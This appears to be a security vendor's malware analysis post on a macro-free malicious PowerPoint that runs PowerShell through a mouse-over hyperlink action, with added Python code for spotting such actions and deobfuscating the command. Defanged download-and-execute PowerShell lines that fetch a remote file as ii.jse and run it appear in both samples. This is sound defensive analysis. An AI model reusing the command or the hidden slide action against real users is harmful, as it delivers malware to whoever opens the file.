CSP-CERT® Malware Research:
Malicious PowerPoint: Macro Alternative

by CSP-CERT® Research Science
posted June 2017

If you work in security, or are simply security-conscious, you probably already know that most malicious documents in the wild work in one of two ways: they exploit a vulnerability in the document reader, or they carry a malicious embedded macro (by far the more common case).

However, CSP-CERT® received reports of a malicious PowerPoint document spreading via email that uses no macro at all. The sample instead abuses PowerPoint's hyperlink action feature, which lets a slide object run an external program.

Opening the presentation shows a single slide, as in the screenshot below.

Note that the malicious action is not triggered unless you do two things:

  1. Run the slideshow (object actions only fire in slideshow mode, not in the editing view)
  2. Move the mouse over the hyperlinked text

Once both happen, PowerPoint attempts to carry out the action, but it first displays a security notice, much like the warning shown for macro-enabled documents.

The notice below warns that the presentation is about to run an external program that may be unsafe. Clicking Disable nullifies the attack; clicking Enable tells PowerPoint to go ahead and run the program, exactly as enabling a macro lets the macro run. In this case the program is PowerShell, invoked with a command that downloads and executes a file named ii.jse (an encoded JScript file, which Windows hands to the Windows Script Host to run).

How does this work? PowerPoint lets you attach an action to any object on a slide (text, a shape, a picture), triggered either by clicking the object or by moving the mouse over it. One of the available actions is "Run program", which launches an arbitrary command line.

To see the action attached to the object in our sample, right-click it and choose Hyperlink.

This shows the action the object carries, which in our case is to execute PowerShell on mouse over.
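As an added illustration (not part of the original CSP-CERT® write-up), the following Python script shows where such an action lives inside the .pptx package and how to find it without ever opening the file in PowerPoint. A .pptx is a zip of XML parts: a hyperlink action is an a:hlinkClick or a:hlinkMouseOver element in ppt/slides/slideN.xml whose action attribute is ppaction://program, and its r:id points at a Relationship in ppt/slides/_rels/slideN.xml.rels whose Target carries the (percent-encoded) command line. The package the script builds is a constructed, minimal stand-in with just those two parts, not the real malware, and the command line placed in it is made up for the example.

```python
"""Locate "Run program" hyperlink actions inside a .pptx without opening PowerPoint.

Added example; the package built below is a constructed stand-in for a real
presentation, reduced to the two parts that matter for this check.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = R_NS + "/hyperlink"

# The element name tells us which user gesture fires the hyperlink.
TRIGGERS = {
    "{%s}hlinkClick" % A_NS: "click",
    "{%s}hlinkMouseOver" % A_NS: "mouseover",
}
SLIDE_RE = re.compile(r"^ppt/slides/(slide\d+)\.xml$")


def find_program_actions(pptx_bytes):
    """Return a list of {slide, trigger, target} for every ppaction://program action."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        names = set(zf.namelist())
        for name in sorted(names):
            m = SLIDE_RE.match(name)
            if not m:
                continue
            slide = m.group(1)
            # Relationship ids (rId2 ...) are resolved through the slide's own .rels part.
            rels = {}
            rels_name = "ppt/slides/_rels/%s.xml.rels" % slide
            if rels_name in names:
                for rel in ET.fromstring(zf.read(rels_name)).iter("{%s}Relationship" % PKG_NS):
                    rels[rel.get("Id")] = rel
            for el in ET.fromstring(zf.read(name)).iter():
                trigger = TRIGGERS.get(el.tag)
                if trigger is None:
                    continue
                # Ordinary web links carry no action attribute; "Run program" uses ppaction://program.
                if not el.get("action", "").startswith("ppaction://program"):
                    continue
                rel = rels.get(el.get("{%s}id" % R_NS))
                # Targets are percent-encoded in the .rels part; decode for the analyst.
                target = unquote(rel.get("Target", "")) if rel is not None else "<unresolved rId>"
                hits.append({"slide": slide, "trigger": trigger, "target": target})
    return hits


# Constructed command line for the sample package; it only illustrates the shape of a target.
SAMPLE_CMD = ("powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'hxxp://cccn.nl/c.php','ii.jse');Invoke-Item 'ii.jse'\"")

# Constructed slide: one harmless web link (click, no action) and one mouse-over "Run program".
SLIDE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="%s" xmlns:r="%s" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cSld><p:spTree>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US"><a:hlinkClick r:id="rId2"/></a:rPr>
      <a:t>A harmless web link</a:t>
    </a:r></a:p></p:txBody></p:sp>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US"><a:hlinkMouseOver r:id="rId3" action="ppaction://program"/></a:rPr>
      <a:t>Hover here</a:t>
    </a:r></a:p></p:txBody></p:sp>
  </p:spTree></p:cSld>
</p:sld>""" % (A_NS, R_NS)

RELS_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="%s/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="%s" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId3" Type="%s" Target="%s" TargetMode="External"/>
</Relationships>""" % (PKG_NS, R_NS, HYPERLINK_TYPE, HYPERLINK_TYPE, quote(SAMPLE_CMD, safe=""))


def build_sample_pptx():
    """Build a minimal in-memory package containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", SLIDE_XML)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", RELS_XML)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_program_actions(build_sample_pptx()):
        print("%s: on %s run -> %s" % (hit["slide"], hit["trigger"], hit["target"]))
```

Point find_program_actions at the bytes of a real .pptx to triage a suspicious attachment; the ordinary hyperlink in the sample is deliberately left unflagged so the check does not drown in normal web links.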

The PowerShell command it runs is the typical download-and-execute one-liner seen in many macro-laden documents, with a light layer of obfuscation.

Each "+[char] 0x2F" appends a forward slash (0x2F is the ASCII code for "/"), so the URL never appears literally in the command. Folding those casts back into the string gives the cleaned-up command shown below.

Note: in the transcription below, http has been replaced by hxxp to defang the URL.

The line consists of two commands:

  1. The download command, which fetches hxxp://cccn.nl/c.php and saves it locally as ii.jse.
  2. The execute command, which runs the saved file with Invoke-Item. Invoke-Item opens a file with its default handler, so for a .jse file the script is actually run by the Windows Script Host (wscript.exe), not by PowerShell itself.
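As an added example (not from the original write-up), the Python below folds the "+[char] 0x2F" obfuscation back into plain strings, splits the one-liner at its statement separators and labels each statement as the download or the execute step. The SAMPLE script body is constructed in the style the article describes, reusing only the defanged URL and the ii.jse file name from the page; the exact wording of the real command is not reproduced. It also generalizes slightly: it accepts decimal as well as hex [char] casts and recognizes a few other common download and execution cmdlets beyond DownloadFile and Invoke-Item.

```python
"""Normalize the "+[char] 0x2F" obfuscation and split the one-liner into its commands.

Added example. SAMPLE is a constructed PowerShell script body in the style the
article describes; only the defanged URL and file name come from the write-up,
the rest of the wording is assumed.
"""
import re

SAMPLE = ("(New-Object Net.WebClient).DownloadFile('hxxp:'+[char] 0x2F+[char] 0x2F"
          "+'cccn.nl'+[char] 0x2F+'c.php','ii.jse');Invoke-Item 'ii.jse'")

CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9A-Fa-f]+|\d+)", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^'\"\s,)]+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|Start-BitsTransfer", re.I)
EXECUTE_RE = re.compile(r"(?:^|\|\s*)(?:Invoke-Item|ii|Start-Process|saps|Invoke-Expression|iex)\b", re.I)
SAVE_AS_RE = re.compile(r"DownloadFile\(\s*'[^']*'\s*,\s*'([^']*)'", re.I)


def fold_char_casts(script):
    """Turn [char] 0x2F / [char]47 into quoted literals, then join adjacent 'a'+'b' pieces.

    Assumes the casts never spell a quote character itself (0x27 would need
    PowerShell's doubled-quote escaping, which this simple folder does not model).
    """
    # int(x, 0) accepts both "0x2F" and "47".
    folded = CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", script)
    while True:  # join until no more 'a'+'b' pairs remain
        joined = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", folded)
        if joined == folded:
            return folded
        folded = joined


def split_statements(script):
    """Split on ';' outside quotes (the PowerShell statement separator)."""
    statements, current, quote = [], [], None
    for ch in script:
        if quote:
            current.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            current.append(ch)
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    statements.append("".join(current).strip())
    return [s for s in statements if s]


def classify(statement):
    """Label one statement as download / execute / other and pull out its key operands."""
    info = {"text": statement}
    if DOWNLOAD_RE.search(statement):
        info["kind"] = "download"
        url = URL_RE.search(statement)
        info["url"] = url.group(0) if url else None
        save_as = SAVE_AS_RE.search(statement)
        info["save_as"] = save_as.group(1) if save_as else None
    elif EXECUTE_RE.search(statement):
        info["kind"] = "execute"
        # Target is the first quoted string, or the first bare token after the verb.
        quoted = re.search(r"'([^']*)'|\"([^\"]*)\"", statement)
        if quoted:
            info["target"] = quoted.group(1) if quoted.group(1) is not None else quoted.group(2)
        else:
            parts = statement.split()
            info["target"] = parts[1] if len(parts) > 1 else None
    else:
        info["kind"] = "other"
    return info


def analyze(script):
    """Deobfuscate, split and classify; returns one dict per statement."""
    return [classify(s) for s in split_statements(fold_char_casts(script))]


if __name__ == "__main__":
    print(fold_char_casts(SAMPLE))
    for item in analyze(SAMPLE):
        print(item)
```

The fold step is deliberately a fixed-point loop: after the casts become single-character literals the string is still in many pieces, and each pass joins neighbouring pairs until the URL reads as one literal, which is what you want to feed into blocklists or a sandbox.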

Malicious actors are creative and will keep finding new ways to run their code. As seen above, the author simply took advantage of a legitimate PowerPoint feature to download and execute code without any macro. This means it can slip past email security and anti-virus products that key on macros or known exploits, because 1.) no macro is involved and 2.) no vulnerability is exploited; the document itself is well-formed and looks benign until the action fires.

To avoid falling victim to this attack, always read what the prompt is asking you to allow. The Microsoft security notice is there for a reason; do not click Enable reflexively. When unsure, click Disable and investigate further rather than clicking Enable/Yes and regretting it later. For defenders, the behaviour described above also leaves a clear trace: PowerPoint (POWERPNT.EXE) spawning powershell.exe is rare in normal use and worth alerting on.